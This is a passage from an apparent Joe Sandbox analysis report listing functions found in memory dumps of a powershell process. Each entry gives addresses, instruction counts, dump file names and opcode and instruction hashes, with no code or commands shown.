                                  • Instruction ID: 2e4bd86d001e59c67c86ebbd603399ead9278eb0404b968b3aee820badd98618
                                  • Opcode Fuzzy Hash: 152c4f346a721850db0e1828128727a6d8ab6efd9b4b915c04a6be3063f60547
                                  • Instruction Fuzzy Hash: 94310778A00609DFCB14CF98C5849AEFBB1FF48310B2486A9D959AB752C731EC91CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03088000 Relevance: .1, Instructions: 73COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f7e2b81e0e5079ca1a0d2a9662ead27557eef303d97977c2cb3a07a51af0ff3
                                  • Instruction ID: f4903b3438cfe41f70a93ed3d29fb461a3f3c7499d09e82c2f713e7b9e0477a0
                                  • Opcode Fuzzy Hash: 6f7e2b81e0e5079ca1a0d2a9662ead27557eef303d97977c2cb3a07a51af0ff3
                                  • Instruction Fuzzy Hash: E521F335A053458FCB82DB78E8815EE7FB0AF86310B5841DAD145CF322D6749985CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030892F0 Relevance: .1, Instructions: 67COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 292b07aa10d6deae4e775ff0879074db35c8c1803fb47374a90815c445f45a01
                                  • Instruction ID: 39df02824a4bd2fb8f7f02fbea0f1af0b86f9bdc67097ce648fc49e4e7df95c9
                                  • Opcode Fuzzy Hash: 292b07aa10d6deae4e775ff0879074db35c8c1803fb47374a90815c445f45a01
                                  • Instruction Fuzzy Hash: D521E674A006069FCB04DF89C5949AAFBF5FF89310B2485A9D949EB751C731ED42CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030831C8 Relevance: .1, Instructions: 65COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 58db84e3ae8a4689b433f7ac99b69beaeeb290571e64b3de317ec9d936e1556f
                                  • Instruction ID: 36c8a69b07258068d58ff6ef4c79bb6dcc0f48bf081d39cfb4b0bc04e275c7d8
                                  • Opcode Fuzzy Hash: 58db84e3ae8a4689b433f7ac99b69beaeeb290571e64b3de317ec9d936e1556f
                                  • Instruction Fuzzy Hash: 38214C78A05219DFCB00DF9CC4909AEBBB5FF89300B148595D955EB352C734ED41CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03088320 Relevance: .1, Instructions: 64COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f2a4ede948856612bff4359288a9629eef64b75f2ed9582ed7a763758222f044
                                  • Instruction ID: 1001a54fc467c7e6489887f726581882d329bc7afaf438a6b21354daeff8ea0a
                                  • Opcode Fuzzy Hash: f2a4ede948856612bff4359288a9629eef64b75f2ed9582ed7a763758222f044
                                  • Instruction Fuzzy Hash: 6C1193312093409FC716E728D404A99BBE5EF86619F0D80EAE04D8B6A2C776D84BC755
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030831B9 Relevance: .1, Instructions: 60COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e07a69742589c1190ae37464d6ecaa7572eab7f56ba61291e39a6157804d3ac
                                  • Instruction ID: 02cf2a0874c405b20d0cf72967a26c804cd2e8b7694f3b9d9233e9710dbae506
                                  • Opcode Fuzzy Hash: 5e07a69742589c1190ae37464d6ecaa7572eab7f56ba61291e39a6157804d3ac
                                  • Instruction Fuzzy Hash: D2213678A012198FCB00DF9CD8809AEFBB4FF89310B1485A9D949AB352C731ED41CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03088310 Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 13e53c47c54951b0a8f31a5a94d3338e58a044ff516dab7940736c1f1e653d0b
                                  • Instruction ID: 3926d83e342052a306888d16e95fb201d9b4e548750576fb5f4601be62bd9c1b
                                  • Opcode Fuzzy Hash: 13e53c47c54951b0a8f31a5a94d3338e58a044ff516dab7940736c1f1e653d0b
                                  • Instruction Fuzzy Hash: C401D6312093409FC725E728D804B95BFE8AF42619F4D80EAD08C8F5A3C775D846C799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0308AAA0 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6abe2329e1f99fecf9bc531d241e18806c61b84429d4656b9a8a2c6d05c57e69
                                  • Instruction ID: d1b38ac811787632b3f78483a82cb75e03b22874517f8b0a0cebd230e5efad14
                                  • Opcode Fuzzy Hash: 6abe2329e1f99fecf9bc531d241e18806c61b84429d4656b9a8a2c6d05c57e69
                                  • Instruction Fuzzy Hash: EB11E931B093409FC715DB69C405666BBFAEF42214F0880ABD8858F653D679E945CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08456F60 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4d8e4baaa8fad714f8f60c83ae7dcbc3cc3790727e5963fddd3a1259871d706f
                                  • Instruction ID: 8b23aa0278064cc81fd3e9efd3d75f2c4ad65cfe063f2f3e937c5178bff70c5b
                                  • Opcode Fuzzy Hash: 4d8e4baaa8fad714f8f60c83ae7dcbc3cc3790727e5963fddd3a1259871d706f
                                  • Instruction Fuzzy Hash: D411CC35900209EFDB05CF98D884E9DBBB2FF98314F658159E804AB361C775AD82CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 084561C1 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 899d276ba48c204c786c271cafd84b6de53baae45c590045bf8932fe4604917d
                                  • Instruction ID: b60acdb47e13e80e1c7c100c61b7acb3517f6c10e4f49563756a95d2dd214104
                                  • Opcode Fuzzy Hash: 899d276ba48c204c786c271cafd84b6de53baae45c590045bf8932fe4604917d
                                  • Instruction Fuzzy Hash: E2017170205685CFC3279B38945446EBBB2FFC221538954AED8468B752CB75AC15CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0300D01D Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838376879.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_300d000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 248c6983a9257b58141e216ecab90b3e37cc8cde99369315799cf0421d481d88
                                  • Instruction ID: 85604355d0421b2f58f47e916a444447722612c66fcdb5a9c4661bfcdf3646fe
                                  • Opcode Fuzzy Hash: 248c6983a9257b58141e216ecab90b3e37cc8cde99369315799cf0421d481d88
                                  • Instruction Fuzzy Hash: 0901F27240A3409AF7108AA5CA80B6AFFDCDF41324F0CC45AEE4C4A2C2CAB89845C6B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08455F58 Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 610cfdb4408b1f4f0861f3f2fc6774f571b108053cff6933279239d34eae71d7
                                  • Instruction ID: 9f2363009e9797ab3d4d66d8522138ddc5a377acf069f429e13b587027f239c6
                                  • Opcode Fuzzy Hash: 610cfdb4408b1f4f0861f3f2fc6774f571b108053cff6933279239d34eae71d7
                                  • Instruction Fuzzy Hash: 88018C31A10209DFDB149FE0C955ABEBBB2FF84305F61002AE903AB256DB754C81CB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07640AB8 Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 50f95b139486253c87584eae2440d5c8dbdffea5e99752897f805a3c68b814ac
                                  • Instruction ID: a18be656cf8b6ad9f141992e44812956a0048756dfe305cfc1c00bdc0f56bc25
                                  • Opcode Fuzzy Hash: 50f95b139486253c87584eae2440d5c8dbdffea5e99752897f805a3c68b814ac
                                  • Instruction Fuzzy Hash: D3F08B71604725EFC32C4A38E580627FBAAFBC13587348A2DC44617B04CB31ACC1C790
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08455E37 Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 31f7ed0827fd1156b13f82c55f9678950da621f036966bcb6032efb0fcb4e133
                                  • Instruction ID: 8e20fa18719d4431c20fb7942270e5fc5e35283c0456ba9c2c0db1636d8b7157
                                  • Opcode Fuzzy Hash: 31f7ed0827fd1156b13f82c55f9678950da621f036966bcb6032efb0fcb4e133
                                  • Instruction Fuzzy Hash: 4E015E30A00209DFDB14EBE0C91AABD7B76FF84315F214019E903AB256CB754D42CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030882B0 Relevance: .0, Instructions: 40COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f7b1029d7b5127f4cc2c7086be480ed50c37173d49ca73d621a988373dfc9c9d
                                  • Instruction ID: e7e4259d6caafea45e3b1af98d0cbe2b968cdf47923c3d4f829be4f6d2a272e8
                                  • Opcode Fuzzy Hash: f7b1029d7b5127f4cc2c7086be480ed50c37173d49ca73d621a988373dfc9c9d
                                  • Instruction Fuzzy Hash: 31F0BB312023009FC725E719D4049A6BBE4EB86659B4D80AEE04D8B661C776DC46C769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 076462F5 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 87473a384e593a600b6fd6ca36e2116219ac717d732c3a6567f578429e69ecdf
                                  • Instruction ID: 3cd9b7614226827670f22899937dd710822630b980d17154f18c0d67e3692e22
                                  • Opcode Fuzzy Hash: 87473a384e593a600b6fd6ca36e2116219ac717d732c3a6567f578429e69ecdf
                                  • Instruction Fuzzy Hash: 2CF0C2A560E3C58FD7178B74D9644A0FFB2AF83114B0C82CBD4858F163DA259847C366
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0300D01C Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838376879.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_300d000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5d54dfc3a90709dfed901d7221eac852bd5014e43e786c406ed43fd22f54a848
                                  • Instruction ID: b8fca862ab11a941c367d0f8e077e7dd779534b404f1084a37e7040e83e9372b
                                  • Opcode Fuzzy Hash: 5d54dfc3a90709dfed901d7221eac852bd5014e43e786c406ed43fd22f54a848
                                  • Instruction Fuzzy Hash: 97F0C272409344AEF7108A15D984B62FFDCEB41634F18C05AED4C4A282C6B9A845CAB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 084560B3 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 29f6327599d065001911d2064289242fdf51b82871e918cc0e89cb91cd2f1e83
                                  • Instruction ID: 309fa3e8f18dcbae8985dd880a7db1b5f768b263bfe8c89a88052c5f173d3d04
                                  • Opcode Fuzzy Hash: 29f6327599d065001911d2064289242fdf51b82871e918cc0e89cb91cd2f1e83
                                  • Instruction Fuzzy Hash: AEF0AF30A04209DFEB04DBE0C966ABE3B31BF90309F61041AD903AB287DE755845DB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0308810A Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 181823b0151245897ea3cfdef9d7b91b5243c3d3c68afaaa8080d9f9b9633c33
                                  • Instruction ID: d240efdb06f8cc56d13d324ea91051f4860b9658ccd6e5d09a153344942cd465
                                  • Opcode Fuzzy Hash: 181823b0151245897ea3cfdef9d7b91b5243c3d3c68afaaa8080d9f9b9633c33
                                  • Instruction Fuzzy Hash: DE01F674E0020A8FCB80DF68D4859AEBFF5BF48210F5041A9E605EB321D730AA91CBD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08455EE0 Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 28a16a43cb33746c14ef22b24a0b84b3796a0103c849a29eed9029eb7b65f461
                                  • Instruction ID: 4516f3b00a2837256e2e5c17a85fb1d7a9b07660cf0ee0c4fef79fbdd49ed8d6
                                  • Opcode Fuzzy Hash: 28a16a43cb33746c14ef22b24a0b84b3796a0103c849a29eed9029eb7b65f461
                                  • Instruction Fuzzy Hash: E9F03C30A11109DFDB14DFE0D919AAE7FB6FB88305F604129E803E7256DB744D01DB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08455E94 Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d5df8dd5e26074a6ef1d6c5bf9e1b5edf732f58c4f888d1b11d7a1c56d303f9c
                                  • Instruction ID: 56c776ebe429249e9a0b36d263b637762e1457e1e650f32c7f3913bfac10f9ee
                                  • Opcode Fuzzy Hash: d5df8dd5e26074a6ef1d6c5bf9e1b5edf732f58c4f888d1b11d7a1c56d303f9c
                                  • Instruction Fuzzy Hash: BCF03731911119EFDB149FE0D919AAEBF76FF88305F600019E903EA256DF744812DF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08455FB8 Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c28cfe69a0d8e7eb1e5732b218d23fa42bd0d322bdbe63facd1f868dd6d834e7
                                  • Instruction ID: ecf020206caa4f1b670ed611d5379c4e656c4e6de3fe413e3add13ef0a7d12e2
                                  • Opcode Fuzzy Hash: c28cfe69a0d8e7eb1e5732b218d23fa42bd0d322bdbe63facd1f868dd6d834e7
                                  • Instruction Fuzzy Hash: ABF03730910119EFDB249FE0D919AAE7F76FB88305F604019E903AB256DB744841DF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08455DF3 Relevance: .0, Instructions: 30COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 763ad3b367ba9fbd613de206aee798f48f1d9e8052026b8f0b05a2d323fc44a9
                                  • Instruction ID: 7067ebb6a189df26304c41f7cbad56f35e48d10a9ce1d8491dd13cf2395a4e56
                                  • Opcode Fuzzy Hash: 763ad3b367ba9fbd613de206aee798f48f1d9e8052026b8f0b05a2d323fc44a9
                                  • Instruction Fuzzy Hash: 25F04931911209DFDB049BD0D919AAEBFB6FB44305F600015E903EB256DB744C01DB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08455DB0 Relevance: .0, Instructions: 30COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 778bd1ef71af5ec53f0a213d124371912107b4631b23f919fe6fd54e2f4abe22
                                  • Instruction ID: c5bb6d909c214aa9b2f414bc6b60cac1227db1114a5e2ed7ae38070d0c5a079d
                                  • Opcode Fuzzy Hash: 778bd1ef71af5ec53f0a213d124371912107b4631b23f919fe6fd54e2f4abe22
                                  • Instruction Fuzzy Hash: 13F06730910209EFEB14DFE0D92AAAE7F7AFB88305F600019E803EB246DB744C41DB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03082D5E Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ee549847ca539cc4e7cde72304174f6e3f524d0b1ca239eba67b0e2ce58e7b6e
                                  • Instruction ID: 08903ef82e70861cd9ea59b4cd45377e3764e4f364f1a2ae691b2dcfb6b0013d
                                  • Opcode Fuzzy Hash: ee549847ca539cc4e7cde72304174f6e3f524d0b1ca239eba67b0e2ce58e7b6e
                                  • Instruction Fuzzy Hash: 14F0DA35A001059FCB15CF9DD990AEEF7B5FF88324F248159E555A72A1C732EC52CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 030882D0 Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7ac1a0e350bc5bb4da2a58187ef34c6563bb4ba8efeb9a07459e05cfbfeac249
                                  • Instruction ID: a2838fa08f0fd6f77083e47810aef7a619505512279502b393fca3f59eb9af13
                                  • Opcode Fuzzy Hash: 7ac1a0e350bc5bb4da2a58187ef34c6563bb4ba8efeb9a07459e05cfbfeac249
                                  • Instruction Fuzzy Hash: A3F02B3224B2805FCB4BEB60D4D8492BF65BA9226431949EFE18CCF117C126F486C726
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03088118 Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 595c656320a2c389b4536f18d0ca37e775f1ff5125e0c189519b6d8285382184
                                  • Instruction ID: 01fdd6cbaf83182357a4028a555ba0dabefbc1851a014e442bad1683768dbbb0
                                  • Opcode Fuzzy Hash: 595c656320a2c389b4536f18d0ca37e775f1ff5125e0c189519b6d8285382184
                                  • Instruction Fuzzy Hash: B0F09774E0020A8FCB80DF68C485AAEBBF5BF49314F5051A9D509EB321D630A941CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 076460BC Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cbc76431d99304793443aa2520867e271a182598b749c8ffe91aae2c92219beb
                                  • Instruction ID: 8df7290765b59fe9de158f41722c0b2b25d13b49c70d77259ac80ce7ccb15b4f
                                  • Opcode Fuzzy Hash: cbc76431d99304793443aa2520867e271a182598b749c8ffe91aae2c92219beb
                                  • Instruction Fuzzy Hash: 32F0307560A3858FD7038B24CA54992BB72AB87616F1DC1DBD0498F293C7728846CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0308A748 Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4e236c071b35d014c84ba6ef2ee1d8b24dd47caf90572d79ab046b6c97a55b4f
                                  • Instruction ID: 4ef6cbb1f32b58ae59343047ea8b7cbb7ba43ed7dab267dbe2fb80221662c201
                                  • Opcode Fuzzy Hash: 4e236c071b35d014c84ba6ef2ee1d8b24dd47caf90572d79ab046b6c97a55b4f
                                  • Instruction Fuzzy Hash: D4E0D8353007409FD309EB6DE9549EA7BA2DFC5300B04916AE602CF784CFB4AC4687A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08456003 Relevance: .0, Instructions: 25COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fa66c22a7b91bf1170c70e9eb5d7c6ef0964a30e41f0b0a1051231fdbd5c5223
                                  • Instruction ID: 8a4e976fa45684b643f0f7facbaacc1c6b5b3316f48bb5c73a5cd0440816df12
                                  • Opcode Fuzzy Hash: fa66c22a7b91bf1170c70e9eb5d7c6ef0964a30e41f0b0a1051231fdbd5c5223
                                  • Instruction Fuzzy Hash: 67F0A030640109EFEB00DBD0D919ABE3B76FB88301F200509E903AB286DF784946DB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0845611D Relevance: .0, Instructions: 25COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 25ea1bcc78865a83ae8855b7397e619cac9bb5b71a7ca6df20a39f0df7153c9e
                                  • Instruction ID: 0014b3e2d8343abe4a92b5263704e17f2cee5e3d6e128aa03a64149309cd4ddd
                                  • Opcode Fuzzy Hash: 25ea1bcc78865a83ae8855b7397e619cac9bb5b71a7ca6df20a39f0df7153c9e
                                  • Instruction Fuzzy Hash: AFF0A030640109EFEB00DBD0D959A7F3B76FB84301F204109E903AA246DF784906DB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 084560F5 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9bbc3a24d473d7a5ab1b2b0bbe3f625492b4ac9e134e04610f77ae176f530bef
                                  • Instruction ID: 1d189b229f8ea346e745879338730ff1d90ec67e6da471eec7dc9b3ef04af5ab
                                  • Opcode Fuzzy Hash: 9bbc3a24d473d7a5ab1b2b0bbe3f625492b4ac9e134e04610f77ae176f530bef
                                  • Instruction Fuzzy Hash: 4AE09A3054020EEFEB049BD0D96AA7F3F39FB90305F600419EA03AA247DEB488159F92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08456065 Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
